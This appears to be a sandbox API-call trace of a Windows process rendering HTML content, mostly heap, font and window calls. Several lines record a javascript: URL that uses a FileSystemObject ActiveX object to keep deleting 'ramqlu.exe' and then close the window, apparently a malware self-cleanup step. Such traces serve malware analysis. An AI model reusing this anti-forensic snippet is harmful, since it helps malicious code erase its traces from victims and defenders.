[0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x190) returned 0x47c7c8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x108) returned 0x47c960 [0076.612] LsSetModWidthPairs () returned 0x0 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x240) returned 0x47ca70 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x18) returned 0x46fde8 [0076.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x472258 [0076.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x10) returned 0x47a5a0 [0076.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2e0) returned 0x47ccb8 [0076.613] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x24) returned 0x4539d8 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x47cfa0 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x47d068 [0076.614] LsSetBreaking () returned 0x0 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x271) returned 0x47d130 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa) returned 0x47a5b8 [0076.614] LsSetDoc () returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613c0, reserved=0x47ae6c) returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613d0, reserved=0x47ae6c) returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613e0, reserved=0x47ae6c) returned 0x0 [0076.614] IBindStatusCallback:OnLowResource (This=0x4613f0, reserved=0x47ae6c) returned 0x0 [0076.614] LsCreateLine () returned 0x0 [0076.614] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x47d3b0 [0076.614] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xf8) returned 0x47d470 [0076.615] EnumFontsW (hdc=0x100109d1, lpLogfont="Times New Roman", lpProc=0x74c40b47, lParam=0x2ce7fc) returned 1 [0076.616] CreateFontIndirectW (lplf=0x2ce798) returned 0x80a0a6b [0076.616] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.616] GetTextMetricsW (in: hdc=0x100109d1, lptm=0x2ce700 | out: lptm=0x2ce700) returned 1 [0076.617] GetOutlineTextMetricsW (in: hdc=0x100109d1, cjCopy=0xd8, potm=0x2ce600 | out: potm=0x2ce600) returned 0xd8 [0076.617] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.617] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.617] GetTextFaceW (in: hdc=0x100109d1, c=32, lpName=0x2ce850 | out: lpName="Times New Roman") returned 16 [0076.617] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.618] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.618] GetTextCharsetInfo (in: hdc=0x100109d1, lpSig=0x2ce7b8, dwFlags=0x0 | out: lpSig=0x2ce7b8) returned 0 [0076.618] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.618] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xc) returned 0x47a5d0 [0076.618] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.618] GetFontUnicodeRanges (in: hdc=0x100109d1, lpgs=0x0 | out: lpgs=0x0) returned 0x27c [0076.618] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.618] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x27c) returned 0x47dc30 [0076.618] GetFontUnicodeRanges (in: hdc=0x100109d1, lpgs=0x47dc30 | out: lpgs=0x47dc30) returned 0x27c [0076.618] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.618] SelectObject (hdc=0x100109d1, h=0x80a0a6b) returned 0x18a002e [0076.618] GetCharWidth32W (in: hdc=0x100109d1, iFirst=0x20, iLast=0x7e, lpBuffer=0x2ce790 | out: lpBuffer=0x2ce790) returned 1 [0076.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x17c) returned 0x47deb8 [0076.621] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x800) returned 0x47e040 [0076.621] SelectObject (hdc=0x100109d1, h=0x18a002e) returned 0x80a0a6b [0076.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x47e848 [0076.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb4) returned 0x47e908 [0076.622] LsQueryLineDup () returned 0x0 [0076.622] LsDestroyLine () returned 0x0 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x60) returned 0x461740 [0076.622] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x45f3c8 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ccb8 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf5d4, lprcSrc1=0x2cf5d4, lprcSrc2=0x2cf5a4 | out: lprcDst=0x2cf5d4) returned 1 [0076.623] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf5c4 | out: lprcDst=0x459c28) returned 1 [0076.623] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf5e4 | out: lprcDst=0x459c28) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf294, lprcSrc1=0x2cf294, lprcSrc2=0x2cf264 | out: lprcDst=0x2cf294) returned 1 [0076.623] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf284 | out: lprcDst=0x459c28) returned 1 [0076.623] IntersectRect (in: lprcDst=0x459c28, lprcSrc1=0x459c28, lprcSrc2=0x2cf2a4 | out: lprcDst=0x459c28) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf1a8, lprcSrc1=0x2cf1a8, lprcSrc2=0x459c18 | out: lprcDst=0x2cf1a8) returned 1 [0076.623] UnionRect (in: lprcDst=0x2cf4b0, lprcSrc1=0x2cf4b0, lprcSrc2=0x2cf45c | out: lprcDst=0x2cf4b0) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf358, lprcSrc1=0x2cf358, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf358) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf3f0, lprcSrc1=0x2cf3f0, lprcSrc2=0x2cf358 | out: lprcDst=0x2cf3f0) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf358, lprcSrc1=0x2cf358, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf358) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf3f0, lprcSrc1=0x2cf3f0, lprcSrc2=0x2cf358 | out: lprcDst=0x2cf3f0) returned 1 [0076.623] IntersectRect (in: lprcDst=0x2cf448, lprcSrc1=0x2cf448, lprcSrc2=0x2cf3e0 | out: lprcDst=0x2cf448) returned 1 [0076.624] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.624] UnionRect (in: lprcDst=0x2cf7f0, lprcSrc1=0x2cf7f0, lprcSrc2=0x2cf79c | out: lprcDst=0x2cf7f0) returned 1 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a08 [0076.624] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453a08 | out: hHeap=0x410000) returned 1 [0076.624] RedrawWindow (hWnd=0x202a8, lprcUpdate=0x2cf870, hrgnUpdate=0x0, flags=0x21) returned 1 [0076.624] GetFocus () returned 0x202a8 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x461400 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x4) returned 0x461410 [0076.624] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a08 [0076.624] GetFocus () returned 0x202a8 [0076.624] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.625] GetCapture () returned 0x0 [0076.625] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a38 [0076.625] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.625] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x453a68 [0076.625] GetCurrentThreadId () returned 0x90 [0076.625] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.625] GetCurrentThreadId () returned 0x90 [0076.625] GetCurrentThreadId () returned 0x90 [0076.625] GetFocus () returned 0x202a8 [0076.626] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.626] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.626] GetCurrentThreadId () returned 0x90 [0076.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.626] GetCurrentThreadId () returned 0x90 [0076.626] GetCurrentThreadId () returned 0x90 [0076.626] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x45dbd0, Size=0x6c) returned 0x47ccb8 [0076.627] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.627] GetCapture () returned 0x0 [0076.627] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.627] GetCurrentThreadId () returned 0x90 [0076.627] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.628] GetCapture () returned 0x0 [0076.628] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.628] GetCurrentThreadId () returned 0x90 [0076.628] GetCurrentThreadId () returned 0x90 [0076.629] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.629] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.629] GetCurrentThreadId () returned 0x90 [0076.629] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.629] GetCurrentThreadId () returned 0x90 [0076.629] GetCurrentThreadId () returned 0x90 [0076.629] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf518 | out: lpPoint=0x2cf518) returned 1 [0076.630] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.630] GetCurrentThreadId () returned 0x90 [0076.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.630] GetCurrentThreadId () returned 0x90 [0076.630] GetCurrentThreadId () returned 0x90 [0076.630] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x47ccb8, Size=0x9c) returned 0x47ccb8 [0076.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453a68 | out: hHeap=0x410000) returned 1 [0076.630] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461400 | out: hHeap=0x410000) returned 1 [0076.631] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453a38 | out: hHeap=0x410000) returned 1 [0076.631] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x461410 | out: hHeap=0x410000) returned 1 [0076.631] GetCurrentThreadId () returned 0x90 [0076.631] GetFocus () returned 0x202a8 [0076.631] GetFocus () returned 0x202a8 [0076.631] ParseURLW (in: pcszURL="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ppu=0x2cf868 | out: ppu=0x2cf868) returned 0x0 [0076.631] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0076.631] IUri:GetAbsoluteUri (in: This=0x43bfcc, pbstrAbsoluteUri=0x2cf8e8 | out: pbstrAbsoluteUri=0x2cf8e8*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0076.631] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.631] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0076.632] ShouldShowIntranetWarningSecband () returned 0x0 [0076.807] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf18c | out: ppv=0x2cf18c*=0x75028d20) returned 0x0 [0076.808] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf278 | out: ppvObject=0x2cf278*=0x75028d2c) returned 0x0 [0076.808] IUnknown:Release (This=0x75028d20) returned 0x1 [0076.808] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=3, dwParseFlags=0x0, pwzResult=0x457c78, cchResult=0x8c, pcchResult=0x2cf2c0, dwReserved=0x0 | out: pwzResult="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", pcchResult=0x2cf2c0*=0x8c) returned 0x0 [0076.808] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x11c) returned 0x47ee08 [0076.808] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47ee08 | out: hHeap=0x410000) returned 1 [0076.808] IUnknown:Release (This=0x75028d2c) returned 0x1 [0076.808] DllGetClassObject (in: rclsid=0x44120c*(Data1=0x3050f3b2, Data2=0x98b5, Data3=0x11cf, Data4=([0]=0xbb, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbd, [6]=0xce, [7]=0xb)), riid=0x76814430*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf18c | out: ppv=0x2cf18c*=0x75028d20) returned 0x0 [0076.809] IUnknown:QueryInterface (in: This=0x75028d20, riid=0x7683aadc*(Data1=0x79eac9ec, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x2cf278 | out: ppvObject=0x2cf278*=0x75028d2c) returned 0x0 [0076.809] IUnknown:Release (This=0x75028d20) returned 0x1 [0076.809] IInternetProtocolInfo:ParseUrl (in: This=0x75028d2c, pwzUrl="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);", ParseAction=17, dwParseFlags=0x0, pwzResult=0x457c78, cchResult=0x8c, pcchResult=0x2cf2d0, dwReserved=0x0 | out: pwzResult="", pcchResult=0x2cf2d0*=0x0) returned 0x800c0011 [0076.809] IUnknown:Release (This=0x75028d2c) returned 0x1 [0076.809] GetIUriPriv () returned 0x0 [0076.809] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.809] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf6e0 | out: lpPoint=0x2cf6e0) returned 1 [0076.809] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x45c310 [0076.810] GetCurrentThreadId () returned 0x90 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x45c310 | out: hHeap=0x410000) returned 1 [0076.810] GetCurrentThreadId () returned 0x90 [0076.810] GetCurrentThreadId () returned 0x90 [0076.810] GetFocus () returned 0x202a8 [0076.810] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf850 | out: lpPoint=0x2cf850) returned 1 [0076.810] GetClientRect (in: hWnd=0x202a8, lpRect=0x2cf840 | out: lpRect=0x2cf840) returned 1 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473780 | out: hHeap=0x410000) returned 1 [0076.810] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x47a5e8 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d920 | out: hHeap=0x410000) returned 1 [0076.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451598 | out: hHeap=0x410000) returned 1 [0076.810] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x44a798, Size=0x22) returned 0x44a798 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43c680 | out: hHeap=0x410000) returned 1 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5e8 | out: hHeap=0x410000) returned 1 [0076.811] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4530f8 | out: hHeap=0x410000) returned 1 [0076.811] GetCurrentThreadId () returned 0x90 [0076.812] IUnknown:Release (This=0x455488) returned 0x0 [0076.812] IInternetProtocol:UnlockRequest (This=0x45435c) returned 0x0 [0076.812] IUnknown:Release (This=0x454348) returned 0x0 [0076.812] GetProcessHeap () returned 0x410000 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4613a0 | out: hHeap=0x410000) returned 1 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fd48 | out: hHeap=0x410000) returned 1 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454bf0 | out: hHeap=0x410000) returned 1 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454348 | out: hHeap=0x410000) returned 1 [0076.812] RevokeBindStatusCallback (pBC=0x4503c0, pBSCb=0x453428) returned 0x0 [0076.812] IUnknown:Release (This=0x45342c) returned 0x4 [0076.812] IUnknown:Release (This=0x453428) returned 0x3 [0076.812] IUnknown:Release (This=0x4503c0) returned 0x0 [0076.812] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4515b0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x445b28 | out: hHeap=0x410000) returned 1 [0076.813] IUnknown:Release (This=0x43c254) returned 0xa [0076.813] IUnknown:Release (This=0x43c254) returned 0x9 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4790c0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x454d18 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] IUnknown:Release (This=0x43c254) returned 0x8 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.813] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] IUnknown:Release (This=0x43c254) returned 0x7 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4770a8 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f578 | out: hHeap=0x410000) returned 1 [0076.814] IUnknown:Release (This=0x43c254) returned 0x6 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.814] IUnknown:Release (This=0x43c254) returned 0x5 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fda8 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453418 | out: hHeap=0x410000) returned 1 [0076.814] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453160 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a0d0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fdc8 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453298 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f968 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453308 | out: hHeap=0x410000) returned 1 [0076.815] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f520 | out: hHeap=0x410000) returned 1 [0076.815] GetCurrentThreadId () returned 0x90 [0076.815] GetCurrentThreadId () returned 0x90 [0076.815] GetCurrentThreadId () returned 0x90 [0076.815] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf7a0 | out: lpPoint=0x2cf7a0) returned 1 [0076.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.816] GetCurrentThreadId () returned 0x90 [0076.816] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.816] GetCurrentThreadId () returned 0x90 [0076.816] GetCurrentThreadId () returned 0x90 [0076.816] GetFocus () returned 0x202a8 [0076.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc) returned 0x43f968 [0076.816] NotifyWinEvent (event=0x8005, hwnd=0x202a8, idObject=1, idChild=0) [0076.816] GetCurrentThreadId () returned 0x90 [0076.817] LoadStringW (in: hInstance=0x73710000, uID=0x1fe9, lpBuffer=0x2cf4d8, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0076.817] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x457b50 | out: hHeap=0x410000) returned 1 [0076.817] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a2e8 | out: hHeap=0x410000) returned 1 [0076.817] IUnknown:AddRef (This=0x43bfcc) returned 0x4 [0076.817] IUri:GetScheme (in: This=0x43bfcc, pdwScheme=0x2ce964 | out: pdwScheme=0x2ce964*=0xf) returned 0x0 [0076.817] IUri:GetDisplayUri (in: This=0x43bfcc, pbstrDisplayString=0x2ce970 | out: pbstrDisplayString=0x2ce970*="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 0x0 [0076.817] GetWindowTextW (in: hWnd=0x3017c, lpString=0x2ce510, nMaxCount=512 | out: lpString="") returned 0 [0076.817] NtdllDefWindowProc_W () returned 0x0 [0076.817] SetWindowTextW (hWnd=0x3017c, lpString="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned 1 [0076.817] NtdllDefWindowProc_W () returned 0x1 [0076.818] IUnknown:Release (This=0x43bfcc) returned 0x3 [0076.818] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0076.818] SendMessageW (hWnd=0x4015e, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0076.818] NtdllDefWindowProc_W () returned 0x0 [0076.819] NtdllDefWindowProc_W () returned 0x0 [0076.819] NtdllDefWindowProc_W () returned 0x0 [0076.819] SendMessageW (hWnd=0x3017c, 